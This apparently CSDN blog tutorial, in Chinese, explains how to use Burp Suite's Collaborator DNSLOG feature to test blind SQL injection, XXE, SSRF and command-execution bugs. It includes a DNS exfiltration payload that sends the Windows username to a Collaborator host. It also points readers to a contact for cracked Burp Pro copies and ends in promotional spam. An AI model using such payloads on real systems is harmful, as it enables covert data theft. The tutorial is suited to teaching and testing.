前面的文章讲了在windows和linux上的不同的无文件渗透测试的方法,那么这篇文章给大家讲解如何在漏洞没有回显的情况下,利用burpsuite自带插件进行测试的方式。
首先我们稍微提一下有哪些无回显的漏洞,一般有盲注(SQL注入的一种)、盲XXE(XML外部实体注入的一种)、命令执行、一些特殊的框架漏洞/没有回显的SSRF漏洞等,这些漏洞在正常测试时都没有回显,所以为了更为直观的测试,我们需要使用这类辅助测试工具。
打开burpsuite后,左上角Burp标签内有个Collaborator(只有pro版本有,免费版本没有。网上的破解pro版本很多有后门,没有但是想获取无后门破解pro版本的咨询Testfan校长):
如果对渗透测试有一定了解并且用过这个功能的同学会知道,这个其实本质上是一个DNSLOG,可以记录dns请求,不过他是burpsuite官方搭建的一个平台,所以如果正式测试中使用,尽量自己搭建环境,避免数据外泄(如何自建安全的dnslog平台?不在本文内容范围之内),工具界面如图:
点击copy to clipboard就可以将待测域名获取出来,一般是*.burpcollaborator.net的格式,利用后可以点击poll now来获取记录,框内值是刷新频率。
具体漏洞利用就不说了,来说说通用的漏洞测试流程,使用DNSLOG,首先需要测试途中有DNS请求,否则无法触发DNS解析行为,从而无法使DNSLOG存在记录。既然需要存在DNS解析行为,必然只能通过单独的域名解析行为或是HTTP请求来发起,由于受环境具体漏洞环境影响,盲注、盲XXE以及SSRF等,只能发起HTTP请求,所以在测试时利用带DNSLOG地址的特殊PAYLOAD即可发起DNS请求,而命令/代码执行漏洞则可以通过系统或是代码命令发起HTTP请求也可以单独发起DNS解析请求。
那么我们这边还是模拟一个命令执行漏洞来进行DNSLOG回显回显的操作,由于不采用真实漏洞环境,直接执行系统命令,所以大家不要觉得在真实漏洞环境中无法使用。
使用windows系统下的带数据方法回显,%USERNAME%.xxxx.burpcollaborator.net,结果如下:
刷新collaborator记录,发现得到目标DNS请求记录:
大家在测试时可以通过指定一个唯一的子域名来做判断,例如project1-20190614-testxxe-wang.xx.dnslog.addr。
Burpsuite很多人会用,但是很多人并没有发现他的一些很方便的插件,所以大家在平时使用时,可以多参考参考官方文档来配合使用,可以事半功倍。
从靠劳力赚钱转变成靠脑力赚钱,想入门黑客的小白肯定想知道如何学好?
👉[[[CSDN大礼包:《黑客&网络安全入门&进阶学习资源》免费分享]]](安全链接,放心点击)
一、网安学习成长路线图
Python所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。(全套教程文末领取哈)
二、网安视频合集
观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。
三、精品网安学习书籍
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。
四、网络安全源码合集+工具包
光学理论是没用的,要学会跟着一起敲,要动手实操,才能将自己的所学运用到实际当中去,这时候可以搞点实战案例来学习。
五、网络安全面试题
最后就是大家最关心的网络安全面试题板块
这份完整版的学习资料已经上传CSDN,朋友们如果需要可以微信扫描下方CSDN官方认证二维码免费领取【保证100%免费】
178
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
